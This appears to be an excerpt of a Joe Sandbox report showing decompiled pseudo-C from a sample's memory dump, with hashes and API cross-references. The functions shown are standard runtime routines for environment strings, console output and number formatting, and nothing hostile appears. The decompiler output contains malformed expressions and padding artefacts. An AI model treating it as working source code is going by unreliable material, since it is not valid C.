                                                                                      • Snapshot File: hcaresult_11_2_400000_4113.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ed6135ce67b36efedd41668e1190843f3a5ab02d88d439b7d257a1dc773afb11
                                                                                      • Instruction ID: b554e473e5976ea2b9ee6ea0b56a9bc1c1e4299f9a8d405d354e242d1bce65e7
                                                                                      • Opcode Fuzzy Hash: ed6135ce67b36efedd41668e1190843f3a5ab02d88d439b7d257a1dc773afb11
                                                                                      • Instruction Fuzzy Hash: C621D7F1A0060DAFCB14AF669C809EB77A8EF44359701451BFC38D7651D738EC8087AA
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 17%
                                                                                      			E004290E3() {
                                                                                      				intOrPtr _v8;
                                                                                      				signed int _v12;
                                                                                      				WCHAR* _t5;
                                                                                      				void* _t6;
                                                                                      				intOrPtr _t9;
                                                                                      				WCHAR* _t19;
                                                                                      				WCHAR* _t26;
                                                                                      				WCHAR* _t29;
                                                                                      
                                                                                      				_push(_t21);
                                                                                      				_t5 = GetEnvironmentStringsW();
                                                                                      				_t29 = _t5;
                                                                                      				if(_t29 != 0) {
                                                                                      					_t6 = E004290AC(_t29);
                                                                                      					_t19 = 0;
                                                                                      					_v12 = _t6 - _t29 >> 1;
                                                                                      					_t9 = E00427D31(0, 0, _t29, _t6 - _t29 >> 1, 0, 0, 0, 0);
                                                                                      					_v8 = _t9;
                                                                                      					if(_t9 != 0) {
                                                                                      						_t26 = E00421D39(_t9);
                                                                                      						_push(0);
                                                                                      						if(_t26 != 0) {
                                                                                      							_push(0);
                                                                                      							_push(_v8);
                                                                                      							_push(_t26);
                                                                                      							_push(_v12);
                                                                                      							_push(_t29);
                                                                                      							_push(0);
                                                                                      							_push(0);
                                                                                      							if(E00427D31() != 0) {
                                                                                      								E00421955(0);
                                                                                      								_t19 = _t26;
                                                                                      							} else {
                                                                                      								E00421955(_t26);
                                                                                      							}
                                                                                      							FreeEnvironmentStringsW(_t29);
                                                                                      							_t5 = _t19;
                                                                                      						} else {
                                                                                      							E00421955();
                                                                                      							FreeEnvironmentStringsW(_t29);
                                                                                      							_t5 = 0;
                                                                                      						}
                                                                                      					} else {
                                                                                      						FreeEnvironmentStringsW(_t29);
                                                                                      						_t5 = 0;
                                                                                      					}
                                                                                      				}
                                                                                      				return _t5;
                                                                                      			}











                                                                                      0x004290e9
                                                                                      0x004290eb
                                                                                      0x004290f1
                                                                                      0x004290f5
                                                                                      0x004290fd
                                                                                      0x00429102
                                                                                      0x00429110
                                                                                      0x00429113
                                                                                      0x0042911b
                                                                                      0x00429120
                                                                                      0x00429134
                                                                                      0x00429137
                                                                                      0x0042913a
                                                                                      0x0042914d
                                                                                      0x0042914e
                                                                                      0x00429151
                                                                                      0x00429152
                                                                                      0x00429155
                                                                                      0x00429156
                                                                                      0x00429157
                                                                                      0x00429162
                                                                                      0x0042916d
                                                                                      0x00429172
                                                                                      0x00429164
                                                                                      0x00429165
                                                                                      0x00429165
                                                                                      0x00429176
                                                                                      0x0042917c
                                                                                      0x0042913c
                                                                                      0x0042913c
                                                                                      0x00429143
                                                                                      0x00429149
                                                                                      0x00429149
                                                                                      0x00429122
                                                                                      0x00429123
                                                                                      0x00429129
                                                                                      0x00429129
                                                                                      0x0042917f
                                                                                      0x00429182

                                                                                      APIs
                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 004290EB
                                                                                        • Part of subcall function 00427D31: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,004264E6,?,00000000,-00000008), ref: 00427DDD
                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00429123
                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00429143
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.604085544.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_400000_4113.jbxd
                                                                                      Similarity
                                                                                      • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                      • String ID:
                                                                                      • API String ID: 158306478-0
                                                                                      • Opcode ID: 2d26e6305249f7b71c32d81821fddc132fcfcc78da707488691be2aaf92c5b5b
                                                                                      • Instruction ID: d3b774b84d90028c5ac06bfc672d72ef517ab5b7adc91b89351797ff02865a87
                                                                                      • Opcode Fuzzy Hash: 2d26e6305249f7b71c32d81821fddc132fcfcc78da707488691be2aaf92c5b5b
                                                                                      • Instruction Fuzzy Hash: E111A5F1705537BE77152B737C8DCBF6A6CDE86399790042BF40691101EA2C9D0185B9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E0042FF97(void* _a4, long _a8, DWORD* _a12) {
                                                                                      				void* _t13;
                                                                                      
                                                                                      				_t13 = WriteConsoleW( *0x443a90, _a4, _a8, _a12, 0);
                                                                                      				if(_t13 == 0 && GetLastError() == 6) {
                                                                                      					E0042FF80();
                                                                                      					E0042FF42();
                                                                                      					_t13 = WriteConsoleW( *0x443a90, _a4, _a8, _a12, _t13);
                                                                                      				}
                                                                                      				return _t13;
                                                                                      			}




                                                                                      0x0042ffb4
                                                                                      0x0042ffb8
                                                                                      0x0042ffc5
                                                                                      0x0042ffca
                                                                                      0x0042ffe5
                                                                                      0x0042ffe5
                                                                                      0x0042ffeb

                                                                                      APIs
                                                                                      • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,0042C472,00000000,00000001,00000000,00000000,?,00421265,00000000,00000000,00000000), ref: 0042FFAE
                                                                                      • GetLastError.KERNEL32(?,0042C472,00000000,00000001,00000000,00000000,?,00421265,00000000,00000000,00000000,00000000,00000000,?,00421823,00000000), ref: 0042FFBA
                                                                                        • Part of subcall function 0042FF80: CloseHandle.KERNEL32(FFFFFFFE,0042FFCA,?,0042C472,00000000,00000001,00000000,00000000,?,00421265,00000000,00000000,00000000,00000000,00000000), ref: 0042FF90
                                                                                      • ___initconout.LIBCMT ref: 0042FFCA
                                                                                        • Part of subcall function 0042FF42: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0042FF71,0042C45F,00000000,?,00421265,00000000,00000000,00000000,00000000), ref: 0042FF55
                                                                                      • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,0042C472,00000000,00000001,00000000,00000000,?,00421265,00000000,00000000,00000000,00000000), ref: 0042FFDF
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.604085544.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_400000_4113.jbxd
                                                                                      Similarity
                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                      • String ID:
                                                                                      • API String ID: 2744216297-0
                                                                                      • Opcode ID: bf2e4416379429360feb3247554c5736a4e9051b5cfcbff7e55d51dfaefecf04
                                                                                      • Instruction ID: e273299a1c226340d7e6ae76a81486f9c2cff00950df4c2c310153f616b4f000
                                                                                      • Opcode Fuzzy Hash: bf2e4416379429360feb3247554c5736a4e9051b5cfcbff7e55d51dfaefecf04
                                                                                      • Instruction Fuzzy Hash: D3F01236200129BBCF125FD1EC0898E3F76EF097B2B814071FA1D95530C6318964DB98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 73%
                                                                                      			E00407860(void* __ebx, void* __edi, intOrPtr* _a4, char _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, signed char _a28, intOrPtr _a32) {
                                                                                      				char _v8;
                                                                                      				char _v16;
                                                                                      				signed int _v20;
                                                                                      				char _v24;
                                                                                      				intOrPtr _v28;
                                                                                      				intOrPtr _v32;
                                                                                      				char _v48;
                                                                                      				intOrPtr _v52;
                                                                                      				char _v56;
                                                                                      				char _v72;
                                                                                      				intOrPtr* _v76;
                                                                                      				intOrPtr _v80;
                                                                                      				intOrPtr* _v84;
                                                                                      				char _v88;
                                                                                      				char _v92;
                                                                                      				signed int _v96;
                                                                                      				char _v100;
                                                                                      				char _v104;
                                                                                      				char* _v116;
                                                                                      				void* _v124;
                                                                                      				void* __esi;
                                                                                      				void* __ebp;
                                                                                      				signed int _t173;
                                                                                      				signed int _t174;
                                                                                      				intOrPtr _t179;
                                                                                      				intOrPtr* _t192;
                                                                                      				intOrPtr* _t202;
                                                                                      				intOrPtr _t208;
                                                                                      				intOrPtr _t209;
                                                                                      				signed int _t211;
                                                                                      				intOrPtr* _t215;
                                                                                      				intOrPtr* _t220;
                                                                                      				char _t225;
                                                                                      				short* _t230;
                                                                                      				char* _t231;
                                                                                      				intOrPtr _t237;
                                                                                      				intOrPtr* _t244;
                                                                                      				intOrPtr* _t248;
                                                                                      				char _t265;
                                                                                      				void* _t276;
                                                                                      				intOrPtr _t278;
                                                                                      				intOrPtr* _t280;
                                                                                      				void* _t281;
                                                                                      				char _t282;
                                                                                      				intOrPtr* _t283;
                                                                                      				intOrPtr* _t284;
                                                                                      				intOrPtr* _t289;
                                                                                      				intOrPtr* _t290;
                                                                                      				intOrPtr _t292;
                                                                                      				intOrPtr _t295;
                                                                                      				intOrPtr _t296;
                                                                                      				intOrPtr _t301;
                                                                                      				char _t302;
                                                                                      				signed int _t304;
                                                                                      				void* _t312;
                                                                                      				intOrPtr _t315;
                                                                                      				intOrPtr* _t325;
                                                                                      				intOrPtr* _t326;
                                                                                      				void* _t327;
                                                                                      				intOrPtr* _t330;
                                                                                      				signed char _t334;
                                                                                      				signed char _t337;
                                                                                      				void* _t338;
                                                                                      				void* _t339;
                                                                                      				intOrPtr _t340;
                                                                                      				void* _t341;
                                                                                      				void* _t342;
                                                                                      				char _t344;
                                                                                      				void* _t345;
                                                                                      				char* _t346;
                                                                                      				char* _t354;
                                                                                      				signed int _t355;
                                                                                      				void* _t357;
                                                                                      				void* _t358;
                                                                                      				void* _t360;
                                                                                      				void* _t361;
                                                                                      				void* _t362;
                                                                                      				intOrPtr _t385;
                                                                                      
                                                                                      				_push(0xffffffff);
                                                                                      				_push(0x431a65);
                                                                                      				_push( *[fs:0x0]);
                                                                                      				_t358 = _t357 - 0x58;
                                                                                      				_t173 =  *0x443048; // 0x9900ec21
                                                                                      				_t174 = _t173 ^ _t355;
                                                                                      				_v20 = _t174;
                                                                                      				_push(__ebx);
                                                                                      				_push(__edi);
                                                                                      				_push(_t174);
                                                                                      				 *[fs:0x0] =  &_v16;
                                                                                      				_t278 = _a32;
                                                                                      				_t282 = _a20;
                                                                                      				_t337 = _a28;
                                                                                      				_v104 = _a8;
                                                                                      				_v92 = _t282;
                                                                                      				_v96 = _t337;
                                                                                      				if(_t278 == 0) {
                                                                                      					L4:
                                                                                      					_t344 = 0;
                                                                                      				} else {
                                                                                      					_t276 =  *_t337;
                                                                                      					if(_t276 == 0x2b || _t276 == 0x2d) {
                                                                                      						_t344 = 1;
                                                                                      					} else {
                                                                                      						goto L4;
                                                                                      					}
                                                                                      				}
                                                                                      				_v80 = _t344;
                                                                                      				if(( *(_t282 + 0x14) & 0x00003000) == 0x3000) {
                                                                                      					_t12 = _t344 + 2; // 0x2
                                                                                      					_t179 = _t12;
                                                                                      					_t327 = "pP";
                                                                                      					if(_t179 <= _t278 &&  *((char*)(_t337 + _t344)) == 0x30) {
                                                                                      						_t282 =  *((intOrPtr*)(_t337 + _t344 + 1));
                                                                                      						if(_t282 == 0x78 || _t282 == 0x58) {
                                                                                      							_t344 = _t179;
                                                                                      							_v80 = _t344;
                                                                                      						}
                                                                                      					}
                                                                                      				} else {
                                                                                      					_t327 = "eE";
                                                                                      				}
                                                                                      				_v100 = E00418710(_t282, _t337, _t327);
                                                                                      				_v24 = 0x2e;
                                                                                      				_v24 =  *((intOrPtr*)( *((intOrPtr*)(E0041A69B(_t327, _t344)))));
                                                                                      				_t338 = E00418710(_t282, _t337,  &_v24);
                                                                                      				_t283 =  *((intOrPtr*)( *((intOrPtr*)(_v92 + 0x30)) + 4));
                                                                                      				_v84 = _t283;
                                                                                      				 *((intOrPtr*)( *_t283 + 4))();
                                                                                      				_v8 = 0;
                                                                                      				_t192 = E00408230(_t278,  &_v88);
                                                                                      				_v8 = 0xffffffff;
                                                                                      				_t360 = _t358 + 0x14;
                                                                                      				_t284 = _v84;
                                                                                      				_v76 = _t192;
                                                                                      				if(_t284 != 0) {
                                                                                      					_t326 =  *((intOrPtr*)( *_t284 + 8))();
                                                                                      					if(_t326 != 0) {
                                                                                      						 *((intOrPtr*)( *_t326))(1);
                                                                                      					}
                                                                                      				}
                                                                                      				E00405CE0(_t278, _t327, _t278);
                                                                                      				_v8 = 1;
                                                                                      				_t195 =  >=  ? _v48 :  &_v48;
                                                                                      				 *((intOrPtr*)( *_v76 + 0x1c))(0);
                                                                                      				_t289 =  *((intOrPtr*)( *((intOrPtr*)(_v92 + 0x30)) + 4));
                                                                                      				_v84 = _t289;
                                                                                      				 *((intOrPtr*)( *_t289 + 4))();
                                                                                      				_v8 = 2;
                                                                                      				_t202 = E004088A0(_t278, _t338, _t344,  &_v88, _v96, _t278 + _v96,  >=  ? _v48 :  &_v48);
                                                                                      				_v8 = 1;
                                                                                      				_t361 = _t360 + 4;
                                                                                      				_t330 = _v84;
                                                                                      				_t290 = _t202;
                                                                                      				_v76 = _t290;
                                                                                      				if(_t330 != 0) {
                                                                                      					_t325 =  *((intOrPtr*)( *_t330 + 8))();
                                                                                      					if(_t325 != 0) {
                                                                                      						 *((intOrPtr*)( *_t325))(1);
                                                                                      					}
                                                                                      					_t290 = _v76;
                                                                                      				}
                                                                                      				 *((intOrPtr*)( *_t290 + 0x14))( &_v72);
                                                                                      				_v8 = 3;
                                                                                      				_v96 =  *((intOrPtr*)( *((intOrPtr*)( *_v76 + 0x10))))();
                                                                                      				if(_t338 != _t278) {
                                                                                      					_t265 =  *((intOrPtr*)( *((intOrPtr*)( *_v76 + 0xc))))();
                                                                                      					_t267 =  >=  ? _v48 :  &_v48;
                                                                                      					 *((char*)(( >=  ? _v48 :  &_v48) + _t338)) = _t265;
                                                                                      				}
                                                                                      				_t339 =  ==  ? _v100 : _t338;
                                                                                      				_t280 =  >=  ? _v72 :  &_v72;
                                                                                      				_t208 =  *_t280;
                                                                                      				if(_t208 == 0x7f) {
                                                                                      					L29:
                                                                                      					_t292 = _v92;
                                                                                      					_t209 = _v32;
                                                                                      					_v80 = _t209;
                                                                                      					_t385 =  *((intOrPtr*)(_t292 + 0x24));
                                                                                      					_t340 =  *((intOrPtr*)(_t292 + 0x20));
                                                                                      					if(_t385 < 0 || _t385 <= 0 && _t340 == 0 || _t340 <= _t209) {
                                                                                      						_t341 = 0;
                                                                                      					} else {
                                                                                      						_t341 = _t340 - _t209;
                                                                                      					}
                                                                                      					_t280 = _a4;
                                                                                      					_t211 =  *(_t292 + 0x14) & 0x000001c0;
                                                                                      					if(_t211 == 0x40) {
                                                                                      						_t213 =  >=  ? _v48 :  &_v48;
                                                                                      						_t215 = E00407400(_t292, _t280,  &_v88, _a12, _a16,  >=  ? _v48 :  &_v48, _t344);
                                                                                      						_t362 = _t361 + 0x18;
                                                                                      					} else {
                                                                                      						if(_t211 == 0x100) {
                                                                                      							_t242 =  >=  ? _v48 :  &_v48;
                                                                                      							_t244 = E00407400(_t292, _t280,  &_v88, _a12, _a16,  >=  ? _v48 :  &_v48, _t344);
                                                                                      							_a16 =  *((intOrPtr*)(_t244 + 4));
                                                                                      							_a12 =  *_t244;
                                                                                      							_t215 = E00407390(_t280,  &_v88,  *_t244,  *((intOrPtr*)(_t244 + 4)), _a24, _t341);
                                                                                      							_t362 = _t361 + 0x30;
                                                                                      							_t341 = 0;
                                                                                      						} else {
                                                                                      							_t248 = E00407390(_t280,  &_v88, _a12, _a16, _a24, _t341);
                                                                                      							_t341 = 0;
                                                                                      							_t250 =  >=  ? _v48 :  &_v48;
                                                                                      							_a12 =  *_t248;
                                                                                      							_a16 =  *((intOrPtr*)(_t248 + 4));
                                                                                      							_t215 = E00407400( *((intOrPtr*)(_t248 + 4)), _t280,  &_v88,  *_t248,  *((intOrPtr*)(_t248 + 4)),  >=  ? _v48 :  &_v48, _t344);
                                                                                      							_t362 = _t361 + 0x30;
                                                                                      						}
                                                                                      					}
                                                                                      					_a12 =  *_t215;
                                                                                      					_t217 =  >=  ? _v48 :  &_v48;
                                                                                      					_v80 = _v80 - _t344;
                                                                                      					_t218 = ( >=  ? _v48 :  &_v48) + _t344;
                                                                                      					_a16 =  *((intOrPtr*)(_t215 + 4));
                                                                                      					_t220 = E00407400( *((intOrPtr*)(_t215 + 4)), _t280,  &_v88,  *_t215,  *((intOrPtr*)(_t215 + 4)), ( >=  ? _v48 :  &_v48) + _t344, _v80);
                                                                                      					_t333 = _v92;
                                                                                      					_t344 = _v104;
                                                                                      					_a12 =  *_t220;
                                                                                      					_a16 =  *((intOrPtr*)(_t220 + 4));
                                                                                      					 *((intOrPtr*)(_t333 + 0x20)) = 0;
                                                                                      					 *((intOrPtr*)(_t333 + 0x24)) = 0;
                                                                                      					E00407390(_t280, _t344,  *_t220,  *((intOrPtr*)(_t220 + 4)), _a24, _t341);
                                                                                      					_t295 = _v52;
                                                                                      					_t361 = _t362 + 0x30;
                                                                                      					if(_t295 < 0x10) {
                                                                                      						L44:
                                                                                      						_t296 = _v28;
                                                                                      						_v56 = 0;
                                                                                      						_v52 = 0xf;
                                                                                      						_v72 = 0;
                                                                                      						if(_t296 < 0x10) {
                                                                                      							L48:
                                                                                      							 *[fs:0x0] = _v16;
                                                                                      							_pop(_t342);
                                                                                      							_pop(_t345);
                                                                                      							_pop(_t281);
                                                                                      							return E0041361E(_t344, _t281, _v20 ^ _t355, _t333, _t342, _t345);
                                                                                      						} else {
                                                                                      							_t333 = _v48;
                                                                                      							_t301 = _t296 + 1;
                                                                                      							_t225 = _v48;
                                                                                      							if(_t301 < 0x1000) {
                                                                                      								L47:
                                                                                      								_push(_t301);
                                                                                      								E004138AD(_t333);
                                                                                      								goto L48;
                                                                                      							} else {
                                                                                      								_t333 =  *((intOrPtr*)(_t225 - 4));
                                                                                      								_t301 = _t301 + 0x23;
                                                                                      								if(_t225 -  *((intOrPtr*)(_t225 - 4)) + 0xfffffffc > 0x1f) {
                                                                                      									goto L50;
                                                                                      								} else {
                                                                                      									goto L47;
                                                                                      								}
                                                                                      							}
                                                                                      						}
                                                                                      					} else {
                                                                                      						_t333 = _v72;
                                                                                      						_t312 = _t295 + 1;
                                                                                      						_t237 = _v72;
                                                                                      						if(_t312 < 0x1000) {
                                                                                      							L43:
                                                                                      							_push(_t312);
                                                                                      							E004138AD(_t333);
                                                                                      							_t361 = _t361 + 8;
                                                                                      							goto L44;
                                                                                      						} else {
                                                                                      							_t333 =  *((intOrPtr*)(_t237 - 4));
                                                                                      							_t301 = _t312 + 0x23;
                                                                                      							if(_t237 -  *((intOrPtr*)(_t237 - 4)) + 0xfffffffc > 0x1f) {
                                                                                      								goto L50;
                                                                                      							} else {
                                                                                      								goto L43;
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      				} else {
                                                                                      					while(_t208 > 0) {
                                                                                      						_t315 = _t208;
                                                                                      						if(_t315 >= _t339 - _t344) {
                                                                                      							goto L29;
                                                                                      						} else {
                                                                                      							_t339 = _t339 - _t315;
                                                                                      							_t301 = _v32;
                                                                                      							if(_t301 < _t339) {
                                                                                      								E00408220(_t280);
                                                                                      								L50:
                                                                                      								E0041805F(_t280, _t301, _t333);
                                                                                      								asm("int3");
                                                                                      								asm("int3");
                                                                                      								asm("int3");
                                                                                      								asm("int3");
                                                                                      								asm("int3");
                                                                                      								asm("int3");
                                                                                      								asm("int3");
                                                                                      								asm("int3");
                                                                                      								asm("int3");
                                                                                      								asm("int3");
                                                                                      								asm("int3");
                                                                                      								asm("int3");
                                                                                      								asm("int3");
                                                                                      								asm("int3");
                                                                                      								_push(_t355);
                                                                                      								_t334 =  *(_t361 + 0x14);
                                                                                      								_push(_t344);
                                                                                      								_t346 = _v116;
                                                                                      								 *_t346 = 0x25;
                                                                                      								_t230 = _t346 + 1;
                                                                                      								if((_t334 & 0x00000020) != 0) {
                                                                                      									 *_t230 = 0x2b;
                                                                                      									_t230 = _t230 + 1;
                                                                                      								}
                                                                                      								if((_t334 & 0x00000010) != 0) {
                                                                                      									 *_t230 = 0x23;
                                                                                      									_t230 = _t230 + 1;
                                                                                      								}
                                                                                      								_t302 = _a8;
                                                                                      								 *_t230 = 0x2a2e;
                                                                                      								_t231 = _t230 + 2;
                                                                                      								if(_t302 != 0) {
                                                                                      									 *_t231 = _t302;
                                                                                      									_t231 = _t231 + 1;
                                                                                      								}
                                                                                      								_t304 = _t334 & 0x00003000;
                                                                                      								if((_t334 & 0x00000004) == 0) {
                                                                                      									if(_t304 != 0x2000) {
                                                                                      										if(_t304 != 0x3000) {
                                                                                      											 *_t231 = 0x65 + (_t304 & 0xffffff00 | _t304 != 0x00001000) * 2;
                                                                                      											 *((char*)(_t231 + 1)) = 0;
                                                                                      											return _t346;
                                                                                      										} else {
                                                                                      											 *_t231 = 0x61;
                                                                                      											 *((char*)(_t231 + 1)) = 0;
                                                                                      											return _t346;
                                                                                      										}
                                                                                      									} else {
                                                                                      										goto L63;
                                                                                      									}
                                                                                      								} else {
                                                                                      									if(_t304 == 0x2000) {
                                                                                      										L63:
                                                                                      										 *_t231 = 0x66;
                                                                                      										 *((char*)(_t231 + 1)) = 0;
                                                                                      										return _t346;
                                                                                      									} else {
                                                                                      										if(_t304 != 0x3000) {
                                                                                      											 *_t231 = 0x45 + (_t304 & 0xffffff00 | _t304 != 0x00001000) * 2;
                                                                                      											 *((char*)(_t231 + 1)) = 0;
                                                                                      											return _t346;
                                                                                      										} else {
                                                                                      											 *_t231 = 0x41;
                                                                                      											 *((char*)(_t231 + 1)) = 0;
                                                                                      											return _t346;
                                                                                      										}
                                                                                      									}
                                                                                      								}
                                                                                      							} else {
                                                                                      								_t333 = _v28;
                                                                                      								if(_v28 - _t301 < 1) {
                                                                                      									_push(_v96);
                                                                                      									_v100 = 0;
                                                                                      									L00408B80(_t280,  &_v48, _t339, _t344, 1, _v100, _t339, 1);
                                                                                      								} else {
                                                                                      									_v32 = _t301 + 1;
                                                                                      									_t353 =  >=  ? _v48 :  &_v48;
                                                                                      									_t354 = ( >=  ? _v48 :  &_v48) + _t339;
                                                                                      									E00414BF0(_t354 + 1, _t354, _t301 - _t339 + 1);
                                                                                      									_t361 = _t361 + 0xc;
                                                                                      									 *_t354 = _v96 << 0x00000008 | _v96 & 0x000000ff;
                                                                                      									_t344 = _v80;
                                                                                      								}
                                                                                      								_t280 =  >  ? _t280 + 1 : _t280;
                                                                                      								_t208 =  *_t280;
                                                                                      								if(_t208 != 0x7f) {
                                                                                      									continue;
                                                                                      								} else {
                                                                                      									goto L29;
                                                                                      								}
                                                                                      							}
                                                                                      						}
                                                                                      						goto L67;
                                                                                      					}
                                                                                      					goto L29;
                                                                                      				}
                                                                                      				L67:
                                                                                      			}

















































































                                                                                      0x00407863
                                                                                      0x00407865
                                                                                      0x00407870
                                                                                      0x00407871
                                                                                      0x00407874
                                                                                      0x00407879
                                                                                      0x0040787b
                                                                                      0x0040787e
                                                                                      0x00407880
                                                                                      0x00407881
                                                                                      0x00407885
                                                                                      0x0040788b
                                                                                      0x00407891
                                                                                      0x00407894
                                                                                      0x00407897
                                                                                      0x0040789a
                                                                                      0x0040789d
                                                                                      0x004078a2
                                                                                      0x004078b5
                                                                                      0x004078b5
                                                                                      0x004078a4
                                                                                      0x004078a4
                                                                                      0x004078a8
                                                                                      0x004078ae
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004078a8
                                                                                      0x004078bf
                                                                                      0x004078c7
                                                                                      0x004078d0
                                                                                      0x004078d0
                                                                                      0x004078d3
                                                                                      0x004078da
                                                                                      0x004078e2
                                                                                      0x004078e9
                                                                                      0x004078f0
                                                                                      0x004078f2
                                                                                      0x004078f2
                                                                                      0x004078e9
                                                                                      0x004078c9
                                                                                      0x004078c9
                                                                                      0x004078c9
                                                                                      0x004078fc
                                                                                      0x00407904
                                                                                      0x00407911
                                                                                      0x0040791e
                                                                                      0x00407929
                                                                                      0x0040792c
                                                                                      0x00407931
                                                                                      0x00407937
                                                                                      0x0040793f
                                                                                      0x00407944
                                                                                      0x0040794b
                                                                                      0x0040794e
                                                                                      0x00407951
                                                                                      0x00407956
                                                                                      0x0040795d
                                                                                      0x00407961
                                                                                      0x00407967
                                                                                      0x00407967
                                                                                      0x00407961
                                                                                      0x0040796f
                                                                                      0x0040797d
                                                                                      0x00407988
                                                                                      0x00407997
                                                                                      0x004079a0
                                                                                      0x004079a3
                                                                                      0x004079a8
                                                                                      0x004079ae
                                                                                      0x004079b3
                                                                                      0x004079b8
                                                                                      0x004079bc
                                                                                      0x004079bf
                                                                                      0x004079c2
                                                                                      0x004079c4
                                                                                      0x004079c9
                                                                                      0x004079d2
                                                                                      0x004079d6
                                                                                      0x004079dc
                                                                                      0x004079dc
                                                                                      0x004079de
                                                                                      0x004079de
                                                                                      0x004079e7
                                                                                      0x004079ed
                                                                                      0x004079f8
                                                                                      0x004079fd
                                                                                      0x00407a07
                                                                                      0x00407a12
                                                                                      0x00407a18
                                                                                      0x00407a18
                                                                                      0x00407a1b
                                                                                      0x00407a26
                                                                                      0x00407a2a
                                                                                      0x00407a2e
                                                                                      0x00407ac3
                                                                                      0x00407ac3
                                                                                      0x00407ac6
                                                                                      0x00407ac9
                                                                                      0x00407acc
                                                                                      0x00407ad0
                                                                                      0x00407ad3
                                                                                      0x00407ae3
                                                                                      0x00407adf
                                                                                      0x00407adf
                                                                                      0x00407adf
                                                                                      0x00407ae8
                                                                                      0x00407aeb
                                                                                      0x00407af3
                                                                                      0x00407b86
                                                                                      0x00407b96
                                                                                      0x00407b9b
                                                                                      0x00407af9
                                                                                      0x00407afe
                                                                                      0x00407b47
                                                                                      0x00407b57
                                                                                      0x00407b66
                                                                                      0x00407b6f
                                                                                      0x00407b72
                                                                                      0x00407b77
                                                                                      0x00407b7a
                                                                                      0x00407b00
                                                                                      0x00407b0f
                                                                                      0x00407b14
                                                                                      0x00407b23
                                                                                      0x00407b2d
                                                                                      0x00407b32
                                                                                      0x00407b35
                                                                                      0x00407b3a
                                                                                      0x00407b3a
                                                                                      0x00407afe
                                                                                      0x00407baa
                                                                                      0x00407bad
                                                                                      0x00407bb1
                                                                                      0x00407bb4
                                                                                      0x00407bb9
                                                                                      0x00407bc4
                                                                                      0x00407bc9
                                                                                      0x00407bcc
                                                                                      0x00407bd8
                                                                                      0x00407bdf
                                                                                      0x00407be2
                                                                                      0x00407be9
                                                                                      0x00407bf0
                                                                                      0x00407bf5
                                                                                      0x00407bf8
                                                                                      0x00407bfe
                                                                                      0x00407c28
                                                                                      0x00407c28
                                                                                      0x00407c2b
                                                                                      0x00407c32
                                                                                      0x00407c39
                                                                                      0x00407c40
                                                                                      0x00407c6a
                                                                                      0x00407c6f
                                                                                      0x00407c77
                                                                                      0x00407c78
                                                                                      0x00407c79
                                                                                      0x00407c87
                                                                                      0x00407c42
                                                                                      0x00407c42
                                                                                      0x00407c45
                                                                                      0x00407c46
                                                                                      0x00407c4e
                                                                                      0x00407c60
                                                                                      0x00407c60
                                                                                      0x00407c62
                                                                                      0x00000000
                                                                                      0x00407c50
                                                                                      0x00407c50
                                                                                      0x00407c53
                                                                                      0x00407c5e
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407c5e
                                                                                      0x00407c4e
                                                                                      0x00407c00
                                                                                      0x00407c00
                                                                                      0x00407c03
                                                                                      0x00407c04
                                                                                      0x00407c0c
                                                                                      0x00407c1e
                                                                                      0x00407c1e
                                                                                      0x00407c20
                                                                                      0x00407c25
                                                                                      0x00000000
                                                                                      0x00407c0e
                                                                                      0x00407c0e
                                                                                      0x00407c11
                                                                                      0x00407c1c
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407c1c
                                                                                      0x00407c0c
                                                                                      0x00407a34
                                                                                      0x00407a34
                                                                                      0x00407a3c
                                                                                      0x00407a45
                                                                                      0x00000000
                                                                                      0x00407a47
                                                                                      0x00407a47
                                                                                      0x00407a49
                                                                                      0x00407a4e
                                                                                      0x00407c88
                                                                                      0x00407c8d
                                                                                      0x00407c8d
                                                                                      0x00407c92
                                                                                      0x00407c93
                                                                                      0x00407c94
                                                                                      0x00407c95
                                                                                      0x00407c96
                                                                                      0x00407c97
                                                                                      0x00407c98
                                                                                      0x00407c99
                                                                                      0x00407c9a
                                                                                      0x00407c9b
                                                                                      0x00407c9c
                                                                                      0x00407c9d
                                                                                      0x00407c9e
                                                                                      0x00407c9f
                                                                                      0x00407ca0
                                                                                      0x00407ca3
                                                                                      0x00407ca6
                                                                                      0x00407ca7
                                                                                      0x00407caa
                                                                                      0x00407cad
                                                                                      0x00407cb3
                                                                                      0x00407cb5
                                                                                      0x00407cb8
                                                                                      0x00407cb8
                                                                                      0x00407cbc
                                                                                      0x00407cbe
                                                                                      0x00407cc1
                                                                                      0x00407cc1
                                                                                      0x00407cc2
                                                                                      0x00407cc5
                                                                                      0x00407cca
                                                                                      0x00407ccf
                                                                                      0x00407cd1
                                                                                      0x00407cd3
                                                                                      0x00407cd3
                                                                                      0x00407cd6
                                                                                      0x00407cdf
